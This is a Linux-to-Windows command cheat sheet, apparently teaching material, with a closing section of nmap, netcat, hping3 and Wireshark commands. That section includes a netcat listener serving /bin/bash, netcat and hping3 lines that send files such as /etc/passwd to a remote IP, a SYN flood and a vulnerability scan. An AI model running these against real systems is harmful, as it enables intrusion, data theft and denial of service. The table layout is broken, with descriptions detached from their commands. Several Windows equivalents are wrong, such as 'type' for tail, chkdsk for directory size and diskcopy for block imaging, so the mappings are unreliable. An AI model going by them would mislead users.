Function Linux Command Windows Command Description

Listing Files ls dir Lists files in a directory

ls -a dir /a Lists all files, including hidden files
ls -l dir /q Lists files in long format, showing
permissions, owner, size
ls -R tree Lists directory contents recursively
Copying Files cp source dest copy source dest Copies a file from source to
destination
cp -r source_directory/ dest/ xcopy source_directory Recursively copies all files and
dest /E directories
Moving & mv oldname newname ren oldname newname Renames or moves a file
Renaming
mv file.txt move file.txt destination Moves file to a specified directory
/path/to/directory/
Deleting Files rm file.txt del file.txt Deletes a file
rm -r directory rmdir /s directory Recursively deletes a directory
and its contents
Creating Files touch filename echo.> filename Creates an empty file
Viewing File cat file.txt type file.txt Displays contents of a file
Contents
head -n 5 file.txt more file.txt Displays the first 5 lines of a file
tail -n 5 file.txt type file.txt Displays the last 5 lines of a file
Directory cd /path/to/directory cd \path\to\directory Changes directory
Navigation
pwd cd (no arguments) Displays the current directory
tree tree Shows directory structure in tree
format
File Permissions chmod 755 filename icacls filename /grant Sets file permissions
user:F
chmod 770 ~/projects icacls folder /grant user:F Sets read, write, execute
~/resources permissions for owner/group
chown user:group file.txt takeown /f filename Changes ownership of a file
Disk Usage df -h wmic logicaldisk get Shows disk usage
size,freespace
du -sh /path/to/directory chkdsk Shows size of a specific directory
System Information uname -a systeminfo Displays system information
uptime systeminfo Shows system uptime
free -h systeminfo Shows memory usage
lscpu wmic cpu get name Displays CPU information
lsusb devmgmt.msc Displays USB device information
lspci devmgmt.msc Displays PCI device information
Network ifconfig ipconfig Shows network interfaces and
Management configurations
ping address ping address Tests network connectivity
netstat -tulnp netstat -an Shows network connections
traceroute address tracert address Traces the route packets take to a
network
nslookup domain nslookup domain Queries DNS for domain name or
IP
Process ps aux tasklist Lists running processes
Management
kill PID taskkill /PID Terminates a process by PID
top taskmgr Displays real-time processes and
resource usage
nice -n 10 command start /low command Starts a command with specified
priority
User Management useradd username net user username /add Adds a new user
passwd username net user username * Sets or changes a user's password
passwd -l root net user Administrator Locks a user account
/active:no
passwd -u root net user Administrator Unlocks a user account
/active:yes
userdel username net user username /delete Deletes a user
whoami whoami Shows the current user
groups username net localgroup Displays groups a user belongs to
sudo visudo -f /etc/sudoers - Edits the sudoers file for
permissions
sudo usermod -aG group net localgroup group Adds a user to a group
username username /add
Environment export VAR=value set VAR=value Sets environment variables
Variables
printenv VAR echo %VAR% Displays an environment variable
Text Processing grep "pattern" file.txt findstr "pattern" file.txt Searches for a pattern in a file
awk '{print $1}' file.txt - Text processing and manipulation
sed 's/old/new/g' file.txt sed Replaces text in a file
sort file.txt sort Sorts lines in a file
uniq file.txt uniq Removes duplicate lines
wc -l file.txt find /c Counts lines, words, and
characters in a file
Archiving & tar -cvf archive.tar files tar Archives files into a .tar file
Compression
gzip file gzip file Compresses a file using gzip
zip archive.zip file zip archive.zip file Creates a .zip archive
unzip archive.zip unzip archive.zip Extracts a .zip archive
Scheduling Tasks cron / crontab -e schtasks Schedules tasks
at 15:00 /path/to/script.sh at 15:00 task Executes a task at a specified time
Forensics dd if=/dev/sdX of=image.dd diskcopy Copies data at the block level
strings file Sysinternals strings Extracts readable text from binary
files
sha256sum file certutil -hashfile file Checks file integrity using SHA-256
SHA256
mount /dev/sdX /mnt diskpart Mounts or unmounts file systems
lsof handle (Sysinternals) Lists open files
Shutdown & shutdown -h now shutdown /s Shuts down the system
Reboot
reboot shutdown /r Reboots the system
poweroff shutdown /s Powers off the system
Help & man command command /? Displays manual for a command
Documentation
info command - Displays detailed information
about a command
Additional su - username
commands
sudo ls /root
sudo groupadd project
sudo usermod -aG project
student
grep -i "unauthorized"
/var/log/auth.log
Nmap Commands sudo nmap -sn 192.168.1.0/24
sudo nmap -sS -p 1-1000 [IP_address]
sudo nmap -sV -sS -p 80,443,22 [IP_address]
sudo nmap -O [IP_address]
sudo nmap --script vuln [IP_address]
Netcat (nc) nc -v [IP_address] [port]
Commands
nc -zv [IP_address] 20-80
nc -lp 55555 > sensitive_data.txt
nc [Server_IP] 55555 < extracted_data.txt
nc -lp 4444 -e /bin/bash
nc [Target_IP] 4444
hping3 Commands sudo hping3 -S --flood -p 80 [IP_address]
sudo hping3 -A -p 80 [IP_address]
sudo hping3 -2 -p 53 [IP_address]
sudo hping3 -1 [IP_address]
sudo hping3 -c 1 [IP_address] -d 100 -E
/etc/passwd
Wireshark `ip.addr == [Target_IP] && (tcp
Commands
tcp.flags.ack==1 && tcp.flags.rst==1
Switch to another user
Execute ls as root
Create a group project
Add user to group project
Search logs for unauthorized
access
Discovers active hosts
SYN scan of ports 1-1000
Detects service versions
OS detection
Scans for common vulnerabilities
Retrieves server banners
Scans ports
Sets up a listener for file transfer
Simulates data exfiltration
Reverse shell listener
Connects to reverse shell
SYN flood test
ACK scan (firewall testing)
UDP port scan
ICMP scan for blocked pings
Simulates data exfiltration
Tracks connection resets and anomalies in TCP
responses